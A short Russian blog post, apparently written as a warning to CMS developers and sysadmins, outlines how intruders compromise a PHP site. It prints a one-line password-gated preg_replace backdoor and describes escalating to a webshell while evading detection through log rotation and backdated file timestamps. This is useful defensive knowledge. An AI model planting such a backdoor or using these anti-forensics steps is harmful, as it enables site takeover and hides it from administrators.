Коротко о безопасности веб-приложений...
2014-Jan-08, Wednesday 15:15![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png)
Данный пост может быть полезен разработчикам CMS и сисадминам.
см. также пост в ХабраХабр
- Через дыру (скорее всего, в коде сайта) создать на сайте скрипт Vystavka_anons.php типа
?php if (md5($_POST['p']) == 'b2bf02228dbfbb1cb1e7f853109710fe') { preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']); }
- Дождаться, когда соответствующий моменту 1 логи вебсервера в результате ротации сотрутся. Дабы затруднить поиск собственно эксплуатируемой уязвимости.
- Воспользоваться созданным скриптом чтобы создать вебшелл - например Sokolniki20100223_117.php
- Воспользоваться вебшеллом. Прежде всего для того, чтобы изменить TimeStamp первого залитого файла Vystavka_anons.php на прошлую дабы затруднить поиск новых файлов по modification time.